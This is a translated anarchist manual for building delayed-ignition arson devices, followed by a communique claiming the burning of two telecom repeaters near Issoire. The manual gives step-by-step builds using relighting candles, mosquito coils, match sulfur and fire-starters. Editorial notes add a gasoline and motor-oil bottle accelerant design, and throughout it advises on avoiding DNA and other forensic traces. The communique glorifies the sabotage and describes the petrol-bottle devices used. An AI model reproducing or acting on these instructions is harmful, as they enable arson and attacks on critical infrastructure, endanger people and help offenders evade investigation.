Making delay devices for arsons

PDF French

1. Notes on security

The devices described here can leave traces, all the more so if they don’t ignite. Thus, all manipulations need to be done in a clean environment, with a pair of one-use rubber gloves, while covering your mouth and hair, using a clean garbage bag spread out as a work space, and while wearing a k-way type tracksuit (where hair of any sort won’t cling to it). The device can be stored in a garbage bag or a freezer bag before removing your gloves, to transport it. If the material is bought, don’t buy everything at the same place and paying in cash could be a good idea. Lastly, in the case of a raid, it’s better to be rid of the material and packaging before use.

Lastly, do several tests before using it for real, to be sure that the brands of different materials work well together and to avoid bad surprises!

2. With magic candles

Ingredients:

  • fire-starter
  • magic birthday candles (that re-light)

With the support of the candle or with a clean knife, make a hole corresponding to the diameter of the candle in the fire-starter, and stick the candle in it such that it doesn’t move.

After lighting it, you must in general wait around twenty seconds before the interior filaments are lit and that they will re-light if they extinguish.

Small sparks are given off by candle once it is lit. This device is very simple to make, but it is bright and thus easy to notice, by a passerby for instance.

You can count on 5/6 minutes of delay, before the fire-starter cube lights in turn and sets the rest of the incendiary device alight.

3. With anti-mosquito spirals/incense stick

Ingredients:

  • fire-starter in individual packaging with easy lighting
  • 5/6 matches
  • cellophane
  • small elastics
  • a stick of incense, or a 4/5 cm piece of anti-mosquito spiral

With a knife, remove the sulfur from the matches while avoiding adding wood shavings, and reduce it to a powder (by wrapping it in paper and crushing it with a knife handle, for example).

Put the sulfur in the middle of a square of cellophane and form a tight ball, by twisting the cellophane well. Fix this ball well to the incense stick or the anti-mosquito spiral with an elastic, ensuring that the ball is well stuck, and that the ball isn’t surrounded by elastic all the way until the end (illustration below) – it’s necessary that the ember of the spiral is first in contact with the sulfur, otherwise there is a risk that the device will come undone before igniting.

With another elastic, fix this construction onto the fire-starter, sulfur in contact with the fire-starter.

This device allows an adequately long delay, depending on the length of the spiral/incense before the sulfur: one could do tests to evaluate the time that is obtained. It is also more discreet: there is not a flame before the trigger, but just a small ember and a thin trail of smoke. But it is also more complex and can thus necessitate testing it multiple times before using it, with perhaps different brands for the incense, cellophane and/or matches, and with the amount of manipulations, it’s very important to pay attention to not leave a trace. After lighting it, do not blow on it to extinguish the flame, but shake the device!

[Notes from Warrior Up:
– You can use multiple delays per incendiary device, so that if one fails the rest of the incendiary device still has a chance to ignite.
– In our experience the anti-mosquito spiral is more reliable than incense.
– An alternative configuration that involves less manipulation is using matches covered in camping fire-paste to light the fire-starter, rather than the sulfur cellophane ball. In a match-book, two rows of matches are attached by a staple. You can use one row of these matches to wrap around the spiral, and if there is enough contact the ember of the spiral will light the matches. However, adding fire-paste to the match-heads and the fire-starter ensures this better. In addition, fire-paste between the fire-starter and the plastic bottles of accelerant (see point below) will cut down the time the lit fire-starter takes to pierce the plastic and ignite the accelerant (from over a minute to a few seconds).
– Tape vs. elastics: tape is more likely to pick up DNA evidence during construction, so should be handled very carefully, but it allows a sturdier construction that is less likely to be displaced during transport. Thin strips of duct-tape work well.
– Recommendations for the rest of the incendiary device: two plastic 1.5 L pop-bottles, taped together so that when lying down they form a valley between them. Fill with a mixture of 3/4 gasoline and 1/4 motor oil. To prevent leakage, fill the containers only 3⁄4 full, leaving the top quarter as air space for vapors to collect. If the delay/igniter devices described above are taped into the valley the bottles make together, gravity will bring the lit device down into the accelerant even if the tape is burned. If you were to tape the delay/igniter device to a single bottle, it’s possible that once the fire-starter is lit it would burn through the tape before the plastic bottle, and come undone before the device could ignite. ]

Translated from Attaque

Summer barbecues of repeaters

(Technical details are in bold.)

As you reach to the top of the hill there’s the Great Bear right above your head. And then, below, you see the lights of Issoire, which make war on the stars in the sky. And above all, above everything, there’s a repeater next to you, which reminds you that you didn’t come to recite poetry. Light up the fire…

In the early hours of 22nd August we set fire up there on the hill. In Moidias, two repeaters that serve the telephone line from Issore to Brioude and the broadcasting of many radio frequencies went up in flames. As we couldn’t turn off the city lights, at least we switched off the smartphones .

Because this world is too narrow, it aims at the normalization, control, sterilization and digitalization of any individuality. Because we wanted to give ourselves a breath of air, feel alive rather than suffocate. True, this desire for destruction could have been satisfied with an attack on Red Cross premises, a breeding farm or a migrant detention centre. We attack so as not to be yet another architect of power’s structures. We attack for immediate pleasure and not for a hypothetical radiant future.

As pointed out in other claims, technology – which keeps us immobile and colonizes our imagination – is one of the pillars of civilization. If we agree with this, we cannot be satisfied with a mere exchange of ideas. So we looked for sensitive points on which to act. By burning repeaters, we not only aim at inflicting the greatest damage on the promoters of technological prosthesis. It’s a way of communicating, interacting, sabotaging civilization. So as to break the routine of honest citizens, workers, consumers, all the people – rich or poor, young or old, super-connected or techno-sceptical – who contribute to the development of deep-flow civilization, where we continuously send out information, argue via internet and fuck via SMS. So that those who depend on screens and headphones are immersed in the anguished silence of failed communication, and they are precisely those who are building and perpetrating this kind of relation with the world, thus guaranteeing the fact the latter runs no risks.

But this attack also comes from the will to question the relation we have with the technological mediation of the living (human and non-human) and the digitalization of the existent. It allows us to criticize in deed the construction of all the rules (sexist, racist, homophobic, specist…) spread over by the incessant flow of images and information and which have almost crushed our individualities.

If we add the fact that many comrades are hit by repressive proceedings where, also thanks to the collaboration of phone operators,  the means of communication become instruments to capture those who revolt, here are quite a few reasons to barbecue repeaters. Quite a few reasons none of which contemplate the perspective of opening a crack in normality so that revolution occurs. If this hope embraced us in the past, it is now dead in our hearts.

We wanted this attack to resonate with the string of other barbecues (of repeaters, vehicles and premises of Enedis [a branch of Electricité de France, the national electricity network]…), that took place in the summer of 2017 about which we share many of the criticisms and proposals. In this respect we have asked ourselves what we should do so as not to fall into a dynamic of competition. How be inspired by others’ actions without this becoming a challenge to see who does the biggest one (repeater)?

This is what led us to analyse, plan and carry out this attack. What took us days was the definition of the practical aspects of the plan (how to start a fire without getting burned, for example), but also the sharing of what was at stake, the specificities, desires and limits of each individual who took part in it. We put ourselves at stake and found the means for our desires, even if it was hard physically and emotionally. The beauty of the process through which we tried to unite the violence of the intent with the benevolence of attention, gives us as much satisfaction as that of having succeeded in destroying those repeaters. We are not soldiers, it is in moments like these that our individualities become real, encounter one another and discuss with one another. That we make our own synthesis between theory and practice. That we organize ourselves to destroy the relations of power, attack the dominations that shape us and which we reproduce just like they structure the world.

We destroyed the repeaters by forcing the doors or fences that protected them and placing incendiary devices on different parts of the cables. The devices were simple one and a half litre plastic bottles filled with petrol, on to which a good piece of firelighter was attached with wire.

We won’t end this communique without first expressing our solidarity with Krem and Kara and with those who attack the world and don’t forget they themselves could be part of its mechanisms.

B.A.R.J.O. – Barbecue d’Antennes Relais Joliment Osé

[Nicely Dared Barbecue of Repeaters]

From Attaque via Act for freedom now